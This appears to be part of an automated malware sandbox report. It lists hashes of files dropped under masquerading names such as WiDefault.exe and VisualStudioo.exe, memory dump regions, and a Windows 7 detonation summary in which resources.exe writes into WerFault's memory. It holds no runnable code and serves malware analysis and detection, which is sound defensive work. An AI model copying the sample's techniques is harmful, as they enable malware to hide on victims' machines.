| SHA256 | 0d27074ebd981b248cea7067ad1429b4ea88b39d7ec0658484b05dfb031bdbe4 |
| SHA512 | dd77f41e1d2a9dffc28fb14fdf75dbc8cf470f2ddaddd56944380b72bfeb76ac02581797069076d24d84e41f1328dc4d3de67070b7c3b0564f17721ed0d4ac26 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | 687ff3bb8a8b15736d686119a681097c |
| SHA1 | 18f43aa14e56d4fb158a8804f79fc3c604903991 |
| SHA256 | 51fd45579a0bee4beabbf7aa825ccc646f907dfdf27b2fc1791fa47dc90d5aa2 |
| SHA512 | 047b21b92e74c93f264e2547900decd295f3089b22165372c4060b76bb813ffa6f2af924974936e25a2db551ea1eec722329ae78e1fff08f6f104d041090094a |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | 687ff3bb8a8b15736d686119a681097c |
| SHA1 | 18f43aa14e56d4fb158a8804f79fc3c604903991 |
| SHA256 | 51fd45579a0bee4beabbf7aa825ccc646f907dfdf27b2fc1791fa47dc90d5aa2 |
| SHA512 | 047b21b92e74c93f264e2547900decd295f3089b22165372c4060b76bb813ffa6f2af924974936e25a2db551ea1eec722329ae78e1fff08f6f104d041090094a |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | 687ff3bb8a8b15736d686119a681097c |
| SHA1 | 18f43aa14e56d4fb158a8804f79fc3c604903991 |
| SHA256 | 51fd45579a0bee4beabbf7aa825ccc646f907dfdf27b2fc1791fa47dc90d5aa2 |
| SHA512 | 047b21b92e74c93f264e2547900decd295f3089b22165372c4060b76bb813ffa6f2af924974936e25a2db551ea1eec722329ae78e1fff08f6f104d041090094a |
C:\Users\Admin\AppData\Roaming\WiDefault.exe
| MD5 | 394764dfa74ce250be386b93940a4439 |
| SHA1 | 889ff161e9760d4fd66fcb18983ecba1082ae296 |
| SHA256 | 8852b722692a237a557be837bd3ebd2b8f6abf41c1d6eb7a776cb7959eece25a |
| SHA512 | ae85e1375e0e91916ed0d2c26ec91bc924ae32d5dd54f41527df2962ae1e8b202172c16bbb2b76b6a216f2c5171125e6e6642e900f94410b0ab236ff78c96234 |
C:\Users\Admin\AppData\Roaming\WiDefault.exe
| MD5 | 394764dfa74ce250be386b93940a4439 |
| SHA1 | 889ff161e9760d4fd66fcb18983ecba1082ae296 |
| SHA256 | 8852b722692a237a557be837bd3ebd2b8f6abf41c1d6eb7a776cb7959eece25a |
| SHA512 | ae85e1375e0e91916ed0d2c26ec91bc924ae32d5dd54f41527df2962ae1e8b202172c16bbb2b76b6a216f2c5171125e6e6642e900f94410b0ab236ff78c96234 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 556084f2c6d459c116a69d6fedcc4105 |
| SHA1 | 633e89b9a1e77942d822d14de6708430a3944dbc |
| SHA256 | 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8 |
| SHA512 | 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4a5d3690e2d2c1cb6b0e666c89394d91 |
| SHA1 | 6c7fca08ea8804797332f735af5198c3db15352e |
| SHA256 | 1148168c68f3db7d371111cda43ffb67d5fd679819a02e36e8fe56bb0530b641 |
| SHA512 | 18f04330372dea76790da1447152885b19c6c2cf966a7875f53f32d99b79ea782cf429fc0a001fa11a83292ac47e04503f00c45d30ed048306d65932ced0b034 |
C:\Users\Admin\AppData\Roaming\WiDefault.exe
| MD5 | 394764dfa74ce250be386b93940a4439 |
| SHA1 | 889ff161e9760d4fd66fcb18983ecba1082ae296 |
| SHA256 | 8852b722692a237a557be837bd3ebd2b8f6abf41c1d6eb7a776cb7959eece25a |
| SHA512 | ae85e1375e0e91916ed0d2c26ec91bc924ae32d5dd54f41527df2962ae1e8b202172c16bbb2b76b6a216f2c5171125e6e6642e900f94410b0ab236ff78c96234 |
memory/2812-442-0x0000000000400000-0x0000000000412000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4a5d3690e2d2c1cb6b0e666c89394d91 |
| SHA1 | 6c7fca08ea8804797332f735af5198c3db15352e |
| SHA256 | 1148168c68f3db7d371111cda43ffb67d5fd679819a02e36e8fe56bb0530b641 |
| SHA512 | 18f04330372dea76790da1447152885b19c6c2cf966a7875f53f32d99b79ea782cf429fc0a001fa11a83292ac47e04503f00c45d30ed048306d65932ced0b034 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | 687ff3bb8a8b15736d686119a681097c |
| SHA1 | 18f43aa14e56d4fb158a8804f79fc3c604903991 |
| SHA256 | 51fd45579a0bee4beabbf7aa825ccc646f907dfdf27b2fc1791fa47dc90d5aa2 |
| SHA512 | 047b21b92e74c93f264e2547900decd295f3089b22165372c4060b76bb813ffa6f2af924974936e25a2db551ea1eec722329ae78e1fff08f6f104d041090094a |
C:\Users\Admin\AppData\Roaming\2WinDefault.exe
| MD5 | b4f4334ebcea2266ca228c895b1250a3 |
| SHA1 | 7b977b9919e8650592e93d2e9aa71cfc0a62e4fd |
| SHA256 | cecab2aafb3f7a6cb69d419350b103df2a8a9a3f6720b406160cba07b53fc864 |
| SHA512 | faeb87d32d400c24dbeed293827bc407b47cb9ea4ea75ff972242a1236795a7e5ebe0eb59cbea899b69990ce010aedb55821962c56ebc09f5c5411fbe88e82ce |
C:\Users\Admin\AppData\Roaming\2WinDefault.exe
| MD5 | b4f4334ebcea2266ca228c895b1250a3 |
| SHA1 | 7b977b9919e8650592e93d2e9aa71cfc0a62e4fd |
| SHA256 | cecab2aafb3f7a6cb69d419350b103df2a8a9a3f6720b406160cba07b53fc864 |
| SHA512 | faeb87d32d400c24dbeed293827bc407b47cb9ea4ea75ff972242a1236795a7e5ebe0eb59cbea899b69990ce010aedb55821962c56ebc09f5c5411fbe88e82ce |
C:\Users\Admin\AppData\Roaming\2WinDefault.exe
| MD5 | b4f4334ebcea2266ca228c895b1250a3 |
| SHA1 | 7b977b9919e8650592e93d2e9aa71cfc0a62e4fd |
| SHA256 | cecab2aafb3f7a6cb69d419350b103df2a8a9a3f6720b406160cba07b53fc864 |
| SHA512 | faeb87d32d400c24dbeed293827bc407b47cb9ea4ea75ff972242a1236795a7e5ebe0eb59cbea899b69990ce010aedb55821962c56ebc09f5c5411fbe88e82ce |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4a5d3690e2d2c1cb6b0e666c89394d91 |
| SHA1 | 6c7fca08ea8804797332f735af5198c3db15352e |
| SHA256 | 1148168c68f3db7d371111cda43ffb67d5fd679819a02e36e8fe56bb0530b641 |
| SHA512 | 18f04330372dea76790da1447152885b19c6c2cf966a7875f53f32d99b79ea782cf429fc0a001fa11a83292ac47e04503f00c45d30ed048306d65932ced0b034 |
C:\Users\Admin\AppData\Roaming\OperaCrt.exe
| MD5 | 7163cd033d1c5f8fc0aad0e215f09747 |
| SHA1 | 5a2b69bf45dbe9417843a1b22461c15ba5b2e79f |
| SHA256 | af77c5bb71d6d15736c043307197ec86276050faed5076e71b6c405dcaf4e0aa |
| SHA512 | a4ec25d14bd9d96f45108cd87eb21dca17f2ff12b6d3ac429b3a3a3c9f6d15ef2534b361eb33c6722263e87a671f0a0f0645849ab8b62675b723af8a6f59b26f |
C:\Users\Admin\AppData\Roaming\OperaCrt.exe
| MD5 | 7163cd033d1c5f8fc0aad0e215f09747 |
| SHA1 | 5a2b69bf45dbe9417843a1b22461c15ba5b2e79f |
| SHA256 | af77c5bb71d6d15736c043307197ec86276050faed5076e71b6c405dcaf4e0aa |
| SHA512 | a4ec25d14bd9d96f45108cd87eb21dca17f2ff12b6d3ac429b3a3a3c9f6d15ef2534b361eb33c6722263e87a671f0a0f0645849ab8b62675b723af8a6f59b26f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4a5d3690e2d2c1cb6b0e666c89394d91 |
| SHA1 | 6c7fca08ea8804797332f735af5198c3db15352e |
| SHA256 | 1148168c68f3db7d371111cda43ffb67d5fd679819a02e36e8fe56bb0530b641 |
| SHA512 | 18f04330372dea76790da1447152885b19c6c2cf966a7875f53f32d99b79ea782cf429fc0a001fa11a83292ac47e04503f00c45d30ed048306d65932ced0b034 |
C:\Users\Admin\AppData\Roaming\OperaCrt.exe
| MD5 | 7163cd033d1c5f8fc0aad0e215f09747 |
| SHA1 | 5a2b69bf45dbe9417843a1b22461c15ba5b2e79f |
| SHA256 | af77c5bb71d6d15736c043307197ec86276050faed5076e71b6c405dcaf4e0aa |
| SHA512 | a4ec25d14bd9d96f45108cd87eb21dca17f2ff12b6d3ac429b3a3a3c9f6d15ef2534b361eb33c6722263e87a671f0a0f0645849ab8b62675b723af8a6f59b26f |
memory/448-515-0x0000000000400000-0x0000000000412000-memory.dmp
C:\Users\Admin\AppData\Roaming\VisualStudioo.exe
| MD5 | 77878e1d8406d343fdbbfc359b33ff00 |
| SHA1 | 7f6c6bae65298f8a112c97def45f66e6fb99ada8 |
| SHA256 | 396dfcaf630866123805c2349a0789c60978cc7ea003c1906cd90fffba7247b9 |
| SHA512 | 22a1ba9b6ed96d3710fde3ef54d32349ac65513888cf86893932a62b175463d0fcccea274ace50d17cceee50b135f603902d7bb376708b3f2d28fb387c1e8b56 |
C:\Users\Admin\AppData\Roaming\VisualStudioo.exe
| MD5 | 77878e1d8406d343fdbbfc359b33ff00 |
| SHA1 | 7f6c6bae65298f8a112c97def45f66e6fb99ada8 |
| SHA256 | 396dfcaf630866123805c2349a0789c60978cc7ea003c1906cd90fffba7247b9 |
| SHA512 | 22a1ba9b6ed96d3710fde3ef54d32349ac65513888cf86893932a62b175463d0fcccea274ace50d17cceee50b135f603902d7bb376708b3f2d28fb387c1e8b56 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4a5d3690e2d2c1cb6b0e666c89394d91 |
| SHA1 | 6c7fca08ea8804797332f735af5198c3db15352e |
| SHA256 | 1148168c68f3db7d371111cda43ffb67d5fd679819a02e36e8fe56bb0530b641 |
| SHA512 | 18f04330372dea76790da1447152885b19c6c2cf966a7875f53f32d99b79ea782cf429fc0a001fa11a83292ac47e04503f00c45d30ed048306d65932ced0b034 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4a5d3690e2d2c1cb6b0e666c89394d91 |
| SHA1 | 6c7fca08ea8804797332f735af5198c3db15352e |
| SHA256 | 1148168c68f3db7d371111cda43ffb67d5fd679819a02e36e8fe56bb0530b641 |
| SHA512 | 18f04330372dea76790da1447152885b19c6c2cf966a7875f53f32d99b79ea782cf429fc0a001fa11a83292ac47e04503f00c45d30ed048306d65932ced0b034 |
C:\Users\Admin\AppData\Roaming\VisualStudioo.exe
| MD5 | 77878e1d8406d343fdbbfc359b33ff00 |
| SHA1 | 7f6c6bae65298f8a112c97def45f66e6fb99ada8 |
| SHA256 | 396dfcaf630866123805c2349a0789c60978cc7ea003c1906cd90fffba7247b9 |
| SHA512 | 22a1ba9b6ed96d3710fde3ef54d32349ac65513888cf86893932a62b175463d0fcccea274ace50d17cceee50b135f603902d7bb376708b3f2d28fb387c1e8b56 |
memory/3312-539-0x0000000000400000-0x0000000000420000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4a5d3690e2d2c1cb6b0e666c89394d91 |
| SHA1 | 6c7fca08ea8804797332f735af5198c3db15352e |
| SHA256 | 1148168c68f3db7d371111cda43ffb67d5fd679819a02e36e8fe56bb0530b641 |
| SHA512 | 18f04330372dea76790da1447152885b19c6c2cf966a7875f53f32d99b79ea782cf429fc0a001fa11a83292ac47e04503f00c45d30ed048306d65932ced0b034 |
memory/4712-558-0x0000000006B40000-0x0000000006BD8000-memory.dmp
memory/4712-559-0x0000000006B40000-0x0000000006BD8000-memory.dmp
memory/4712-561-0x0000000006B40000-0x0000000006BD8000-memory.dmp
memory/4712-563-0x0000000006B40000-0x0000000006BD8000-memory.dmp
memory/4712-565-0x0000000006B40000-0x0000000006BD8000-memory.dmp
memory/4712-567-0x0000000006B40000-0x0000000006BD8000-memory.dmp
memory/4712-569-0x0000000006B40000-0x0000000006BD8000-memory.dmp
memory/4712-571-0x0000000006B40000-0x0000000006BD8000-memory.dmp
memory/4712-573-0x0000000006B40000-0x0000000006BD8000-memory.dmp
memory/4712-575-0x0000000006B40000-0x0000000006BD8000-memory.dmp
memory/4712-577-0x0000000006B40000-0x0000000006BD8000-memory.dmp
memory/4712-579-0x0000000006B40000-0x0000000006BD8000-memory.dmp
memory/4712-581-0x0000000006B40000-0x0000000006BD8000-memory.dmp
memory/4712-583-0x0000000006B40000-0x0000000006BD8000-memory.dmp
memory/4712-585-0x0000000006B40000-0x0000000006BD8000-memory.dmp
memory/4712-587-0x0000000006B40000-0x0000000006BD8000-memory.dmp
memory/4712-589-0x0000000006B40000-0x0000000006BD8000-memory.dmp
memory/4712-591-0x0000000006B40000-0x0000000006BD8000-memory.dmp
memory/4712-595-0x0000000006B40000-0x0000000006BD8000-memory.dmp
memory/4712-607-0x0000000006B40000-0x0000000006BD8000-memory.dmp
memory/4712-610-0x0000000006B40000-0x0000000006BD8000-memory.dmp
memory/4712-612-0x0000000006B40000-0x0000000006BD8000-memory.dmp
memory/4712-614-0x0000000006B40000-0x0000000006BD8000-memory.dmp
memory/4712-616-0x0000000006B40000-0x0000000006BD8000-memory.dmp
memory/4712-618-0x0000000006B40000-0x0000000006BD8000-memory.dmp
memory/4712-620-0x0000000006B40000-0x0000000006BD8000-memory.dmp
memory/4712-622-0x0000000006B40000-0x0000000006BD8000-memory.dmp
memory/4712-624-0x0000000006B40000-0x0000000006BD8000-memory.dmp
memory/4712-626-0x0000000006B40000-0x0000000006BD8000-memory.dmp
memory/4712-628-0x0000000006B40000-0x0000000006BD8000-memory.dmp
memory/4712-630-0x0000000006B40000-0x0000000006BD8000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 62d0a8f2dde92001b69bb430c8fee54c |
| SHA1 | 9bb2225f9ed5cb3c71c9f166f0fb7a42a7c316ec |
| SHA256 | bd5bcb0c12d851d5e41646c4673e9af1daf7b37743e3b32d7b3754e16732f3f1 |
| SHA512 | a69090461e797b37877e4237686ddf4fe055da4525436660a874fb868a426299bf01fc3373decc3f51b5ebdd3267dc0d7d303ee4c7d1d8fb72704d3190e20174 |
Analysis: behavioral1
Detonation Overview
Submitted
2023-11-15 10:44
Reported
2023-11-15 10:46
Platform
win7-20231023-en
Max time kernel
118s
Max time network
124s
Command Line
Signatures
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\resources.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2244 wrote to memory of 1308 | N/A | C:\Users\Admin\AppData\Local\Temp\resources.exe | C:\Windows\SysWOW64\WerFault.exe |
| PID 2244 wrote to memory of 1308 | N/A | C:\Users\Admin\AppData\Local\Temp\resources.exe | C:\Windows\SysWOW64\WerFault.exe |
| PID 2244 wrote to memory of 1308 | N/A | C:\Users\Admin\AppData\Local\Temp\resources.exe | C:\Windows\SysWOW64\WerFault.exe |
| PID 2244 wrote to memory of 1308 | N/A | C:\Users\Admin\AppData\Local\Temp\resources.exe | C:\Windows\SysWOW64\WerFault.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\resources.exe
"C:\Users\Admin\AppData\Local\Temp\resources.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2244 -s 816
Network
Files
memory/2244-0-0x0000000001270000-0x0000000001286000-memory.dmp
memory/2244-1-0x0000000073F10000-0x00000000745FE000-memory.dmp
memory/2244-3-0x0000000073F10000-0x00000000745FE000-memory.dmp